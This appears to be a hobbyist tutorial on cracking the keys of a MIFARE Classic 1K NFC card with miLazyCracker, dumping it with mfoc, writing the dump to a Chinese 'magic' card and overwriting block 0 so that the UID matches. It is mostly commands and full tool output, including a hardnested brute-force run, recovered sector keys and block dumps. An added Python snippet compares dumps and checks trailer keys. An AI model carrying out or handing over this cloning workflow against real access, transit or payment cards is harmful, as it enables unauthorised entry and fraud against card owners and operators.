Find out the keys of an NFC chip with miLazyCracker, dump the card with the hacked keys, clone the dump onto a second card, check whether the contents are the same, and change the manufacturer block 0 on some Chinese cards (mfcuk and mfoc command).
Find out which card
Buy an ACR122U
- Supports new Ultralight C (via pseudo-APDUs) and Plus SL1 (4-byte UID, via pseudo-APDUs) and SL3
- Supports ISO 14443 Type A and B, FeliCa, and all 4 types of NFC (ISO/IEC 18092) tags
- Read/write speed up to 424 kbps
- CCID-compliant, PC/SC-compliant
Find out the Keys
Execute the miLazyCracker command (after installation)
Found key: 81cc25ebbb6a
Found key: 3e65e4fb65b3
If the device LED turns red -> re-plug the reader immediately (No NFC device found.)
Otherwise the program aborts
Dump the card
Mfoc download: https://github.com/nfc-tools/mfoc/releases
Take a dump of the card if you know key a and b from step 1
mfoc -O carddump.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
With default keys (not changed, fresh card): mfoc -O carddump.dmp
Clone to the second card
You need the dump of the original card (step 1) and a dump of the card onto which you want to write the values of the original card (the clone card)
nfc-mfclassic w a DUMPORIGINALCARD DUMPCLONECARD
Both dumps are made as in step 2
Mathiass-MBP:dump mathias$ nfc-mfclassic w a u original.dmp clone.dmp
NFC reader: ACS ACR122U / ACR122U214 opened
Found MIFARE Classic card:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
Guessing size: seems to be a 1024-byte card
Writing 64 blocks |...............................................................|
Done, 63 of 64 blocks written.
Check if the cards are the same
First original, second clone
Found out that the uid is different
Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
Mathiass-MBP:mifare mathias$ nfc-list
nfc-list uses libnfc libnfc-1.7.1-191-g216145f
NFC device: ACS ACR122U / ACR122U214 opened
1 ISO14443A passive target(s) found:
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
Check the contents
mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
Mathiass-MBP:dump mathias$ hexdump -vC clone.dmp > clone.hex
Mathiass-MBP:dump mathias$ hexdump -vC original.dmp > original.hex
Mathiass-MBP:dump mathias$ diff clone.hex original.hex
Mathiass-MBP:dump mathias$ diff original.hex test.hex
1c1
< 00000000 04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00 |.....Y..D.. ....|
---
> 00000000 7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d |{x2<.....o.mEh..|
Now you can see that only the first block, which holds the UID of the card, is different.
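The hexdump/diff check above, done per block rather than per hexdump line, as an added example (not part of the original post, mfoc or libnfc): it names the kind of block that differs and audits every sector trailer for well-known keys and consistent access bits. The two dumps are constructed from the block 0 values and the key layout shown on this page, the function names are made up for this example, and it assumes the dump file stores both keys in each sector trailer.

```python
# Added example: per-block comparison and trailer audit for MIFARE Classic 1K dumps.
BLOCK, PER_SECTOR, SIZE_1K = 16, 4, 1024
# Well-known keys, taken from the key list in the mfoc output on this page.
DEFAULT_KEYS = {bytes.fromhex(k) for k in (
    "ffffffffffff", "a0a1a2a3a4a5", "d3f7d3f7d3f7", "000000000000", "b0b1b2b3b4b5")}


def split_blocks(dump):
    """Return the 64 16-byte blocks of a 1K dump; reject any other size."""
    if len(dump) != SIZE_1K:
        raise ValueError(f"expected {SIZE_1K} bytes, got {len(dump)}")
    return [dump[i:i + BLOCK] for i in range(0, SIZE_1K, BLOCK)]


def role(block_no):
    """Block 0 is the manufacturer block; the last block of a sector is its trailer."""
    if block_no == 0:
        return "manufacturer"
    return "trailer" if block_no % PER_SECTOR == PER_SECTOR - 1 else "data"


def diff_dumps(a, b):
    """List (block number, role) for every block that differs between two dumps."""
    pairs = zip(split_blocks(a), split_blocks(b))
    return [(n, role(n)) for n, (x, y) in enumerate(pairs) if x != y]


def access_bits_valid(trailer):
    """Bytes 6-8 hold C1..C3 plus an inverted copy; the two copies must agree."""
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    return (b6 & 0x0F, b6 >> 4, b7 & 0x0F) == (c1 ^ 0x0F, c2 ^ 0x0F, c3 ^ 0x0F)


def audit_trailers(dump):
    """Per sector: is key A / key B a well-known default, are the access bits sane?"""
    blocks = split_blocks(dump)
    report = {}
    for sector in range(len(blocks) // PER_SECTOR):
        t = blocks[sector * PER_SECTOR + PER_SECTOR - 1]
        report[sector] = {"default_key_a": t[0:6] in DEFAULT_KEYS,
                          "default_key_b": t[10:16] in DEFAULT_KEYS,
                          "access_ok": access_bits_valid(t)}
    return report


def build_sample(block0_hex):
    """Constructed dump: key layout and access bytes as in the mfoc output on this page."""
    out = bytearray()
    for sector in range(16):
        custom = 4 <= sector <= 14
        key_a = "3e65e4fb65b3" if custom else "ffffffffffff"
        key_b = "81cc25ebbb6a" if custom else "ffffffffffff"
        access = "78778869" if custom else "ff078069"
        out += bytes(BLOCK * 3) + bytes.fromhex(key_a + access + key_b)
    out[0:BLOCK] = bytes.fromhex(block0_hex)  # block 0 values from the diff above
    return bytes(out)


ORIGINAL = build_sample("04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00")
CLONE = build_sample("7b 78 32 3c 0d 08 04 00 01 6f 01 6d 45 68 f8 1d")

if __name__ == "__main__":
    print(diff_dumps(ORIGINAL, CLONE), audit_trailers(ORIGINAL)[4])
```

For real dumps, read the two files with open(path, "rb").read() and pass the bytes to diff_dumps and audit_trailers.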
Also change block 0
nfc-mfclassic W a original.dmp clone.dmp
Mathiass-MBP:check mathias$ mfoc -O clone.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): 7b 78 32 3c
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 3e65e4fb65b3] -> [....///////////.]
[Key: 81cc25ebbb6a] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]
Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
We have all sectors encrypted with the default keys..
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
………
Mathiass-MBP:check mathias$ mfoc -O original.dmp -k 3e65e4fb65b3 -k 81cc25ebbb6a
The custom key 0x3e65e4fb65b3 has been added to the default keys
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 3e65e4fb65b3] -> [....///////////.]
[Key: 81cc25ebbb6a] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]
Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
We have all sectors encrypted with the default keys..
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 53, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 52, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 51, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 50, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 49, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
……………..
Block 09, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 08, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 07, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 06, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 05, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Mathiass-MBP:check mathias$
Mathiass-MBP:mifare mathias$ miLazyCracker
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: ffffffffffff] -> [xxxx...........x]
[Key: a0a1a2a3a4a5] -> [xxxx...........x]
[Key: d3f7d3f7d3f7] -> [xxxx...........x]
[Key: 000000000000] -> [xxxx...........x]
[Key: b0b1b2b3b4b5] -> [xxxx...........x]
[Key: 4d3a99c351dd] -> [xxxx...........x]
[Key: 1a982c7e459a] -> [xxxx...........x]
[Key: aabbccddeeff] -> [xxxx...........x]
[Key: 714c5c886e97] -> [xxxx...........x]
[Key: 587ee5f9350f] -> [xxxx...........x]
[Key: a0478cc39091] -> [xxxx...........x]
[Key: 533cb6c723f6] -> [xxxx...........x]
[Key: 8fd0a4f256e9] -> [xxxx...........x]
Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Unknown Key B
Sector 05 - Unknown Key A Unknown Key B
Sector 06 - Unknown Key A Unknown Key B
Sector 07 - Unknown Key A Unknown Key B
Sector 08 - Unknown Key A Unknown Key B
Sector 09 - Unknown Key A Unknown Key B
Sector 10 - Unknown Key A Unknown Key B
Sector 11 - Unknown Key A Unknown Key B
Sector 12 - Unknown Key A Unknown Key B
Sector 13 - Unknown Key A Unknown Key B
Sector 14 - Unknown Key A Unknown Key B
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 B mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key B of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1909 nonces... leftover complexity 1186294334976 (~2^40.11) - press enter to start brute-force phase
Collected 1919 nonces... leftover complexity 1186294334976 (~2^40.11) - initializing brute-force phase...
Starting 8 threads to test 1186294334976 states using 256-way bitslicing
Cracking... 47.72%
Found key: 81cc25ebbb6a
Tested 566767883890 states
81cc25ebbb6a
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: ffffffffffff] -> [xxxx\\\\\\\\\\\x]
[Key: a0a1a2a3a4a5] -> [xxxx\\\\\\\\\\\x]
[Key: d3f7d3f7d3f7] -> [xxxx\\\\\\\\\\\x]
[Key: 000000000000] -> [xxxx\\\\\\\\\\\x]
[Key: b0b1b2b3b4b5] -> [xxxx\\\\\\\\\\\x]
[Key: 4d3a99c351dd] -> [xxxx\\\\\\\\\\\x]
[Key: 1a982c7e459a] -> [xxxx\\\\\\\\\\\x]
[Key: aabbccddeeff] -> [xxxx\\\\\\\\\\\x]
[Key: 714c5c886e97] -> [xxxx\\\\\\\\\\\x]
[Key: 587ee5f9350f] -> [xxxx\\\\\\\\\\\x]
[Key: a0478cc39091] -> [xxxx\\\\\\\\\\\x]
[Key: 533cb6c723f6] -> [xxxx\\\\\\\\\\\x]
[Key: 8fd0a4f256e9] -> [xxxx\\\\\\\\\\\x]
Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 05 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 06 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 07 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 08 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 09 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 10 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 11 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 12 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 13 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 14 - Unknown Key A Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Using sector 00 as an exploit sector
Card is not vulnerable to nested attack
MFOC not possible, detected hardened Mifare Classic
Trying HardNested Attack...
libnfc_crypto1_crack ffffffffffff 60 B 56 A mfc_04e8f9c2a55980_foundKeys.txt
Found tag with uid c2a55980, collecting nonces for key A of block 56 (sector 14) using known key B ffffffffffff for block 60 (sector 15)
Collected 1584 nonces... leftover complexity 1922805806080 (~2^40.81) - initializing brute-force phase...
Starting 8 threads to test 1922805806080 states using 256-way bitslicing
Cracking... 78.92%
Found key: 3e65e4fb65b3
Tested 1517855538104 states
81cc25ebbb6a
3e65e4fb65b3
mfoc -f mfc_04e8f9c2a55980_foundKeys.txt -O mfc_04e8f9c2a55980_dump.mfd -D mfc_04e8f9c2a55980_unknownMfocSectorInfo.txt
The custom key 0x81cc25ebbb6a has been added to the default keys
The custom key 0x3e65e4fb65b3 has been added to the default keys
Found Mifare Classic 1k tag
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 44
* UID size: double
* bit frame anticollision supported
UID (NFCID1): 04 e8 f9 c2 a5 59 80
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092
Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (7 Byte UID) 2K, Security level 1
Other possible matches based on ATQA & SAK values:
Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: 81cc25ebbb6a] -> [....\\\\\\\\\\\.]
[Key: 3e65e4fb65b3] -> [....xxxxxxxxxxx.]
[Key: ffffffffffff] -> [xxxxxxxxxxxxxxxx]
[Key: a0a1a2a3a4a5] -> [xxxxxxxxxxxxxxxx]
[Key: d3f7d3f7d3f7] -> [xxxxxxxxxxxxxxxx]
[Key: 000000000000] -> [xxxxxxxxxxxxxxxx]
[Key: b0b1b2b3b4b5] -> [xxxxxxxxxxxxxxxx]
[Key: 4d3a99c351dd] -> [xxxxxxxxxxxxxxxx]
[Key: 1a982c7e459a] -> [xxxxxxxxxxxxxxxx]
[Key: aabbccddeeff] -> [xxxxxxxxxxxxxxxx]
[Key: 714c5c886e97] -> [xxxxxxxxxxxxxxxx]
[Key: 587ee5f9350f] -> [xxxxxxxxxxxxxxxx]
[Key: a0478cc39091] -> [xxxxxxxxxxxxxxxx]
[Key: 533cb6c723f6] -> [xxxxxxxxxxxxxxxx]
[Key: 8fd0a4f256e9] -> [xxxxxxxxxxxxxxxx]
Sector 00 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 01 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 02 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 03 - Found Key A: ffffffffffff Found Key B: ffffffffffff
Sector 04 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 05 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 06 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 07 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 08 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 09 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 10 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 11 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 12 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 13 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 14 - Found Key A: 3e65e4fb65b3 Found Key B: 81cc25ebbb6a
Sector 15 - Found Key A: ffffffffffff Found Key B: ffffffffffff
We have all sectors encrypted with the default keys..
Auth with all sectors succeeded, dumping keys to a file!
Block 63, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 62, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 61, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 60, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 59, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 58, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 57, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 56, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 55, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 78 77 88 69 00 00 00 00 00 00
Block 54, type A, key 3e65e4fb65b3 :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
..........
Block 04, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 03, type A, key ffffffffffff :00 00 00 00 00 00 ff 07 80 69 ff ff ff ff ff ff
Block 02, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 01, type A, key ffffffffffff :00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Block 00, type A, key ffffffffffff :04 e8 f9 c2 a5 59 80 88 44 00 c8 20 00 00 00 00
Dump left in: mfc_04e8f9c2a55980_dump.mfd
Do you want clone the card? Place card on reader now and press Y [y/n] y
Usage: nfc-mfclassic f|r|R|w|W a|b u|U<01ab23cd> <dump.mfd> [<keys.mfd> [f]]
f|r|R|w|W - Perform format (f) or read from (r) or unlocked read from (R) or write to (w) or unlocked write to (W) card
*** format will reset all keys to FFFFFFFFFFFF and all data to 00 and all ACLs to default
*** unlocked read does not require authentication and will reveal A and B keys
*** note that unlocked write will attempt to overwrite block 0 including UID
*** unlocking only works with special Mifare 1K cards (Chinese clones)
a|A|b|B - Use A or B keys for action; Halt on errors (a|b) or tolerate errors (A|B)
u|U - Use any (u) uid or supply a uid specifically as U01ab23cd.
<dump.mfd> - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
<keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)
f - Force using the keyfile even if UID does not match (optional)
Examples:
Read c nfc-mfclassic f B u dummy.mfd keyfile.mfd f
Read card to file, using key A and uid 0x01 0xab 0x23 0xcd:
nfc-mfclassic r a U01ab23cd mycard.mfd
Any way to have the files to compile the libnfc_crypto1_crack binary?
https://github.com/ilumitr/miLazyCracker